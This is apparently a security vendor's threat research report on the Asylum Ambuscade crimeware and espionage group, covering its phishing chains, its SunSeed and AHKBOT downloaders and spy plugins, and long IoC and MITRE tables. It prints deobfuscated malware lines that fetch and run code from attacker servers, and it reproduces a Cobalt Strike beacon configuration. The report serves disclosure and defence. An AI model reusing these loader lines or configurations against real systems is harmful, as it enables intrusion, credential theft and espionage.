Asylum Ambuscade is a cybercrime group that has been performing cyberespionage operations on the side. They were first publicly outed in March 2022 by Proofpoint researchers after the group targeted European government staff involved in helping Ukrainian refugees, just a few weeks after the start of the Russia-Ukraine war. In this blogpost, we provide details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.
Key points of this blogpost:
- Asylum Ambuscade has been operating since at least 2020.
- It is a crimeware group that targets bank customers and cryptocurrency traders in various regions, including North America and Europe.
- Asylum Ambuscade also does espionage against government entities in Europe and Central Asia.
Asylum Ambuscade has been running cyberespionage campaigns since at least 2020. We found previous compromises of government officials and employees of state-owned companies in Central Asia countries and Armenia.
In 2022, and as highlighted in the Proofpoint publication, the group targeted government officials in several European countries bordering Ukraine. We assess that the goal of the attackers was to steal confidential information and webmail credentials from official government webmail portals.
The compromise chain starts with a spearphishing email that has a malicious Excel spreadsheet attachment. Malicious VBA code therein downloads an MSI package from a remote server and installs SunSeed, a downloader written in Lua.
Note that we observed some variations in the attachments. In June 2022, the group used an exploit of the Follina vulnerability (CVE-2022-30190) instead of malicious VBA code. This document is shown in Figure 1. It is written in Ukrainian and the decoy is about a security alert regarding a Gamaredon (another well-known espionage group) attack in Ukraine.
Then, if the machine is deemed interesting, the attackers deploy the next stage: AHKBOT. This is a downloader written in AutoHotkey that can be extended with plugins, also written in AutoHotkey, in order to spy on the victim’s machine. An analysis of the group’s toolset is provided later in the blogpost.
Even though the group came into the spotlight because of its cyberespionage operations, it has been mostly running cybercrime campaigns since early 2020.
Since January 2022, we have counted more than 4,500 victims worldwide. While most of them are located in North America, as shown in Figure 2, it should be noted that we have also seen victims in Asia, Africa, Europe, and South America.
The targeting is very wide and mostly includes individuals, cryptocurrency traders, and small and medium businesses (SMBs) in various verticals.
While the goal of targeting cryptocurrency traders is quite obvious – stealing cryptocurrency – we don’t know for sure how Asylum Ambuscade monetizes its access to SMBs. It is possible the group sells the access to other crimeware groups who might, for example, deploy ransomware. We have not observed this in our telemetry, though.
Asylum Ambuscade’s crimeware compromise chain is, overall, very similar to the one we describe for the cyberespionage campaigns. The main difference is the compromise vector, which can be:
- Multiple HTTP redirections in a Traffic Direction System (TDS). The TDS used by the group is referred to as 404 TDS by Proofpoint. It is not exclusive to Asylum Ambuscade and we observed it was, for example, used by another threat actor to deliver Qbot. An example of a redirection chain, captured by io, is shown in Figure 3.
In addition to the different compromise vector, the group developed SunSeed equivalents in other scripting languages such as Tcl and VBS. In March 2023, it developed an AHKBOT equivalent in Node.js that we named NODEBOT. We believe those changes were intended to bypass detections from security products. An overview of the compromise chain is provided in Figure 4.
We believe that the cyberespionage and cybercrime campaigns are operated by the same group.
- The compromise chains are almost identical in all campaigns. In particular, SunSeed and AHKBOT have been widely used for both cybercrime and cyberespionage.
- We don’t believe that SunSeed and AHKBOT are sold on the underground market. These tools are not very sophisticated in comparison to other crimeware tools for sale, the number of victims is quite low were it a toolset shared among multiple groups, and the network infrastructure is consistent across campaigns.
As such, we believe that Asylum Ambuscade is a cybercrime group that is doing some cyberespionage on the side.
We also believe that these three articles describe incidents related to the group:
Those scripts are obfuscated using random variable names and junk code, most likely intended to bypass detections. An example is provided in Figure 5.
Once deobfuscated, this script can be summarized in two lines:
var obj = new ActiveXObject("windowsinstaller.installer"); obj.InstallProduct("https://namesilo.my[.]id/css/ke.msi");
SunSeed is a downloader written in the Lua language and heavily obfuscated, as shown in Figure 6.
Once manually deobfuscated, the main function of the script looks like this:
require('socket.http') serial_number = Drive.Item('C').SerialNumber server_response = socket.request(http://84.32.188[.]96/ + serial_number) pcall(loadstring(server_response)) collectgarbage()
It gets the serial number of the C: drive and sends a GET request to http://
install is a simple Lua script that downloads an AutoHotkey script into C:ProgramDatamscoree.ahk and the legitimate AutoHotkey interpreter into C:ProgramDatamscoree.exe, as shown in Figure 7. This AutoHotkey script is AHKBOT, the second stage downloader.
An even simpler Lua script, move, is shown in Figure 8. It is used to reassign management of a victimized computer from one C&C server to another. It is not possible to update the hardcoded SunSeed C&C server; to complete a C&C reassignment, a new MSI installer needs to be downloaded and executed, exactly as when the machine was first compromised.
As mentioned above, we found another variant of SunSeed developed using the Tcl language instead of Lua, as shown in Figure 9. The main difference is that it doesn’t send the C: drive’s serial number in the GET request.
The third variant was developed in VBS, as shown in Figure 10. The main difference is that it doesn’t download and interpret additional code, but downloads and executes an MSI package.
The main second-stage downloader is AHKBOT, developed in AutoHotkey. As shown in Figure 11, it sends a GET request, with the User-Agent AutoHotkey (the default value used by AutoHotkey), to http://
AHKBOT can be found on disk at various locations, such as C:ProgramDatamscoree.ahk or C:ProgramDataadb.ahk. It downloads and interprets spy plugins, also developed in AutoHotkey. A summary of the 21 plugins is provided in Table 1.
Table 1. SunSeed plugins
|ass||Download and execute a Cobalt Strike loader packed with VMProtect. The beacon’s configuration extracted using the tool CobaltStrikeParser is provided in the IoCs in the Cobalt Strike configuration section.|
|connect||Send the log message connected! to the C&C server.|
|deletecookies||Download SQLite from /download?path=sqlite3slashsqlite3dotdll via HTTP from its C&C server, then delete browser cookies for the domains td.com (a Canadian bank) and mail.ru. We don’t know why the attackers need to delete cookies, especially for these domains. It’s possible it is intended to delete session cookies to force its victims to reenter their credentials that would then be captured by the keylogger.|
|deskscreen||Take a screenshot using Gdip.BitmapFromScreen and send it to the C&C server.|
|deskscreenon||Similar to deskscreen but take screenshots in a 15-second loop.|
|deskscreenoff||Stop the deskscreenon loop.|
|hvncon||Download and execute a custom hVNC (hidden VNC) application from
|hvncoff||Stop the hVNC by executing taskkill /f /im hvnc.exe.|
|keylogon||Start the keylogger, hooked input using DllCall(“SetWindowsHookEx”, […]). The keystrokes are sent to the C&C server when the active application changes.|
|keylogoff||Stop the keylogger.|
|passwords||Steal passwords from Internet Explorer, Firefox, and Chromium-based browsers. It downloads SQLite to read the browser storages. It can also decrypt locally encrypted passwords by calling the Microsoft CryptUnprotectData function. Stolen passwords are sent to the C&C server.
This plugin looks very similar to the password stealer described by Trend Micro in 2020, including the hard drive serial numbers used for debugging: 605109072 and 2786990575. This could indicate that it is still being developed on the same machines.
|rutservon||Download a remote access trojan (RAT) from http://
This is a commercial RAT developed by Remote Utilities LLC that provides full control over the machine on which it is installed.
|rutservoff||Kill the RAT.|
|steal||Download and execute an infostealer – probably based on Rhadamanthys.|
|tasklist||List running processes by using the WMI query Select * from Win32_Process.|
|towake||Move the mouse using MouseMove, 100, 100. This is likely to prevent the computer from going to sleep, especially given the name of the plugin.|
|update||Download a new version of SunSeed AutoHotkey from the C&C server and replace the current SunSeed on disk. The AutoHotkey interpreter is located in C:ProgramDataadb.exe.|
|wndlist||List active windows by calling WinGet windows, List (Autohotkey syntax).|
The plugins send the result back to the C&C server using a log function, as shown in Figure 12.
In March 2023, the attackers developed a variant of AHKBOT in Node.js that we have named NODEBOT – see Figure 13.
- hcmdon (a reverse shell in Node.js)*
- keylogon (download and execute the AutoHotkey keylogger)
- mods (download and install hVNC)*
Asylum Ambuscade is a cybercrime group mostly targeting SMBs and individuals in North America and Europe. However, it appears to be branching out, running some recent cyberespionage campaigns on the side, against governments in Central Asia and Europe from time to time.
It is quite unusual to catch a cybercrime group running dedicated cyberespionage operations, and as such we believe that researchers should keep close track of Asylum Ambuscade activities.
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.
|SHA-1||Filename||ESET detection name||Description|
|2B42FD41A1C8AC12221857DD2DF93164A71B95D7||ass.dll||Win64/Packed.VMProtect.OX||Cobalt Strike loader.|
|D5F8ACAD643EE8E1D33D184DAEA0C8EA8E7FD6F8||DOC/TrojanDownloader.Agent.AAP||Document exploiting the Follina vulnerability.|
|IP||Domain||Hosting provider||First seen||Details|
|5.39.222[.]150||N/A||February 27, 2022||C&C server.|
|5.44.42[.]27||snowzet[.]com||GLOBAL INTERNET SOLUTIONS LLC||December 7, 2022||Cobalt Strike C&C server.|
|5.230.68[.]137||N/A||GHOSTnet GmbH||September 5, 2022||C&C server.|
|5.230.71[.]166||N/A||GHOSTnet GmbH||August 17, 2022||C&C server.|
|5.230.72[.]38||N/A||GHOSTnet GmbH||September 24, 2022||C&C server.|
|5.230.72[.]148||N/A||GHOSTnet GmbH||September 26, 2022||C&C server.|
|5.230.73[.]57||N/A||GHOSTnet GmbH||August 9, 2022||C&C server.|
|5.230.73[.]63||N/A||GHOSTnet GmbH||June 2, 2022||C&C server.|
|5.230.73[.]241||N/A||GHOSTnet GmbH||August 20, 2022||C&C server.|
|5.230.73[.]247||N/A||GHOSTnet GmbH||August 9, 2022||C&C server.|
|5.230.73[.]248||N/A||GHOSTnet GmbH||June 1, 2022||C&C server.|
|5.230.73[.]250||N/A||GHOSTnet GmbH||June 2, 2022||C&C server.|
|5.252.118[.]132||N/A||aezagroup||March 1, 2023||C&C server.|
|5.252.118[.]204||N/A||aezagroup||March 1, 2023||C&C server.|
|5.255.88[.]222||N/A||Serverius||May 28, 2022||C&C server.|
|23.106.123[.]119||N/A||IRT-LSW-SG||February 4, 2022||C&C server.|
|31.192.105[.]28||N/A||HOSTKEY B.V.||February 23, 2022||C&C server.|
|45.76.211[.]131||N/A||The Constant Company, LLC||January 19, 2023||C&C server.|
|45.77.185[.]151||N/A||Vultr Holdings, LLC||December 16, 2022||C&C server.|
|45.132.1[.]238||N/A||Miglovets Egor Andreevich||November 7, 2022||C&C server.|
|45.147.229[.]20||N/A||COMBAHTON||January 22, 2022||C&C server.|
|46.17.98[.]190||N/A||Hostkey_NL abuse, ORG-HB14-RIPE||August 31, 2020||C&C server.|
|46.151.24[.]197||N/A||Hosting technology LTD||January 1, 2023||C&C server.|
|46.151.24[.]226||N/A||Hosting technology LTD||December 23, 2022||C&C server.|
|46.151.25[.]15||N/A||Hosting technology LTD||December 27, 2022||C&C server.|
|46.151.25[.]49||N/A||Podolsk Electrosvyaz Ltd.||December 29, 2022||C&C server.|
|46.151.28[.]18||N/A||Hosting technology LTD||January 1, 2023||C&C server.|
|51.83.182[.]153||N/A||OVH||March 8, 2022||C&C server.|
|51.83.189[.]185||N/A||OVH||March 5, 2022||C&C server.|
|62.84.99[.]195||N/A||VDSINA-NL||March 27, 2023||C&C server.|
|62.204.41[.]171||N/A||HORIZONMSK-AS||December 12, 2022||C&C server.|
|77.83.197[.]138||N/A||HZ-UK-AS||March 7, 2022||C&C server.|
|79.137.196[.]121||N/A||AEZA GROUP Ltd||March 1, 2023||C&C server.|
|79.137.197[.]187||N/A||aezagroup||December 1, 2022||C&C server.|
|80.66.88[.]155||N/A||XHOST INTERNET SOLUTIONS LP||February 24, 2022||C&C server.|
|84.32.188[.]29||N/A||UAB Cherry Servers||January 10, 2022||C&C server.|
|84.32.188[.]96||N/A||UAB Cherry Servers||January 29, 2022||C&C server.|
|85.192.49[.]106||N/A||Hosting technology LTD||December 25, 2022||C&C server.|
|85.192.63[.]13||N/A||AEZA GROUP Ltd||December 27, 2022||C&C server.|
|85.192.63[.]126||N/A||aezagroup||March 5, 2023||C&C server.|
|85.239.60[.]40||N/A||Clouvider||April 30, 2022||C&C server.|
|88.210.10[.]62||N/A||Hosting technology LTD||December 12, 2022||C&C server.|
|89.41.182[.]94||N/A||Abuse-C Role, ORG-HS136-RIPE||September 3, 2021||C&C server.|
|89.107.10[.]7||N/A||Miglovets Egor Andreevich||December 4, 2022||C&C server.|
|89.208.105[.]255||N/A||AEZA GROUP Ltd||December 22, 2022||C&C server.|
|91.245.253[.]112||N/A||M247 Europe||March 4, 2022||C&C server.|
|94.103.83[.]46||N/A||Hosting technology LTD||December 11, 2022||C&C server.|
|94.140.114[.]133||N/A||NANO-AS||March 8, 2022||C&C server.|
|94.140.114[.]230||N/A||NANO-AS||April 13, 2022||C&C server.|
|94.140.115[.]44||N/A||NANO-AS||April 1, 2022||C&C server.|
|94.232.41[.]96||N/A||XHOST INTERNET SOLUTIONS LP||October 2, 2022||C&C server.|
|94.232.41[.]108||N/A||XHOST INTERNET SOLUTIONS LP||August 19, 2022||C&C server.|
|94.232.43[.]214||N/A||XHOST-INTERNET-SOLUTIONS||October 10, 2022||C&C server.|
|98.142.251[.]26||N/A||BlueVPS OU||April 29, 2022||C&C server.|
|98.142.251[.]226||N/A||BlueVPS OU||April 12, 2022||C&C server.|
|104.234.118[.]163||N/A||IPXO LLC||March 1, 2023||C&C server.|
|104.248.149[.]122||N/A||DigitalOcean, LLC||December 11, 2022||C&C server.|
|109.107.173[.]72||N/A||Hosting technology LTD||January 20, 2023||C&C server.|
|116.203.252[.]67||N/A||Hetzner Online GmbH – Contact Role, ORG-HOA1-RIPE||March 5, 2022||C&C server.|
|128.199.82[.]141||N/A||Digital Ocean||December 11, 2022||C&C server.|
|139.162.116[.]148||N/A||Akamai Connected Cloud||March 3, 2022||C&C server.|
|141.105.64[.]121||N/A||HOSTKEY B.V.||March 21, 2022||C&C server.|
|146.0.77[.]15||N/A||Hostkey_NL||April 10, 2022||C&C server.|
|146.70.79[.]117||N/A||M247 Ltd||March 2, 2022||C&C server.|
|157.254.194[.]225||N/A||Tier.Net Technologies LLC||March 1, 2023||C&C server.|
|157.254.194[.]238||N/A||Tier.Net Technologies LLC||March 13, 2023||C&C server.|
|172.64.80[.]1||namesilo.my[.]id||Cloudflare, Inc.||December 14, 2022||C&C server.|
|172.86.75[.]49||N/A||BL Networks||May 17, 2021||C&C server.|
|172.104.94[.]104||N/A||Linode||March 5, 2022||C&C server.|
|172.105.235[.]94||N/A||Linode||April 5, 2022||C&C server.|
|172.105.253[.]139||N/A||Akamai Connected Cloud||March 3, 2022||C&C server.|
|176.124.214[.]229||N/A||VDSINA-NL||December 26, 2022||C&C server.|
|176.124.217[.]20||N/A||Hosting technology LTD||March 2, 2023||C&C server.|
|185.70.184[.]44||N/A||Hostkey_NL||April 12, 2021||C&C server.|
|185.82.126[.]133||N/A||Sia Nano IT||March 12, 2022||C&C server.|
|185.123.53[.]49||N/A||BV-EU-AS||March 14, 2022||C&C server.|
|185.150.117[.]122||N/A||UAB Cherry Servers||April 2, 2021||C&C server.|
|185.163.45[.]221||N/A||MivoCloud SRL||January 2, 2023||C&C server.|
|193.109.69[.]52||N/A||Hostkey_NL||November 5, 2021||C&C server.|
|193.142.59[.]152||N/A||HostShield LTD Admin||November 17, 2022||C&C server.|
|193.142.59[.]169||N/A||ColocationX Ltd.||November 8, 2022||C&C server.|
|194.180.174[.]51||N/A||MivoCloud SRL||December 24, 2022||C&C server.|
|195.2.81[.]70||N/A||Hosting technology LTD||September 27, 2022||C&C server.|
|195.133.196[.]230||N/A||JSC Mediasoft ekspert||July 15, 2022||C&C server.|
|212.113.106[.]27||N/A||AEZA GROUP Ltd||January 28, 2023||C&C server.|
|212.113.116[.]147||N/A||JY Mobile Communications||March 1, 2023||C&C server.|
|212.118.43[.]231||N/A||Hosting technology LTD||March 1, 2023||C&C server.|
|213.109.192[.]230||N/A||BV-EU-AS||June 1, 2022||C&C server.|
Cobalt Strike configuration
BeaconType - HTTP Port - 80 SleepTime - 45000 MaxGetSize - 2801745 Jitter - 37 MaxDNS - Not Found PublicKey_MD5 - e4394d2667cc8f9d0af0bbde9e808c29 C2Server - snowzet[.]com,/jquery-3.3.1.min.js UserAgent - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN) HttpPostUri - /jquery-3.3.2.min.js Malleable_C2_Instructions - Remove 1522 bytes from the end Remove 84 bytes from the beginning Remove 3931 bytes from the beginning Base64 URL-safe decode XOR mask w/ random key HttpGet_Metadata - ConstHeaders Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://code.jquery.com/ Accept-Encoding: gzip, deflate Metadata base64url prepend "__cfduid=" header "Cookie" HttpPost_Metadata - ConstHeaders Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://code.jquery.com/ Accept-Encoding: gzip, deflate SessionId mask base64url parameter "__cfduid" Output mask base64url print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%syswow64dllhost.exe Spawnto_x64 - %windir%sysnativedllhost.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark - 206546002 bStageCleanup - True bCFGCaution - False KillDate - 0 bProcInject_StartRWX - False bProcInject_UseRWX - False bProcInject_MinAllocSize - 17500 ProcInject_PrependAppend_x86 - b'x90x90' Empty ProcInject_PrependAppend_x64 - b'x90x90' Empty ProcInject_Execute - ntdll:RtlUserThreadStart CreateThread NtQueueApcThread-s CreateRemoteThread RtlCreateUserThread ProcInject_AllocationMethod - NtMapViewOfSection bUsesCookies - True HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - round-robin DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - -1 DNS_strategy_fail_seconds - -1
MITRE ATT&CK techniques
This table was built using version 13 of the MITRE ATT&CK framework.
|Resource Development||T1583.003||Acquire Infrastructure: Virtual Private Server||Asylum Ambuscade rented VPS servers.|
|T1587.001||Develop Capabilities: Malware||Asylum Ambuscade develops custom implants in various scripting languages.|
|T1566.001||Phishing: Spearphishing Attachment||Targets receive malicious Excel or Word documents.|
|Execution||T1059.005||Command and Scripting Interpreter: Visual Basic||Asylum Ambuscade has a downloader in VBS.|
|T1059.006||Command and Scripting Interpreter: Python||Asylum Ambuscade has a screenshotter in Python.|
|T1059||Command and Scripting Interpreter||Asylum Ambuscade has downloaders in other scripting languages such as Lua, AutoHotkey, or Tcl.|
|Persistence||T1547.001||Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder||SunSeed persists via a LNK file in the startup folder.|
|Credential Access||T1555.003||Credentials from Password Stores: Credentials from Web Browsers||AHKBOT passwords plugin can steal browser credentials.|
|Discovery||T1087.002||Account Discovery: Domain Account||AHKBOT domain plugin gathers information about the domain using net group.|
|T1010||Application Window Discovery||AHKBOT wndlist plugin lists the active windows.|
|T1482||Domain Trust Discovery||AHKBOT domain plugin gathers information using nltest.|
|T1057||Process Discovery||AHKBOT tasklist plugin lists the active processes using Select * from Win32_Process.|
|T1518.001||Software Discovery: Security Software Discovery||AHKBOT hardware plugin lists security software using Select * from FirewallProduct, Select * from AntiSpywareProduct and Select * from AntiVirusProduct.|
|T1082||System Information Discovery||AHKBOT wndlist plugin gets system information using systeminfo.|
|T1016||System Network Configuration Discovery||AHKBOT wndlist plugin gets network configuration information using ipconfig /all.|
|Collection||T1056.001||Input Capture: Keylogging||AHKBOT keylogon records keystrokes.|
|T1115||Clipboard Data||AHKBOT keylogon monitors the clipboard.|
|T1113||Screen Capture||AHKBOT deskscreen takes screenshot.|
|Command and Control||T1071.001||Application Layer Protocol: Web Protocols||AHKBOT (and all the other downloaders) communicates with the C&C server via HTTP.|
|Exfiltration||T1041||Exfiltration Over C2 Channel||Data is exfiltrated via the C&C channel.|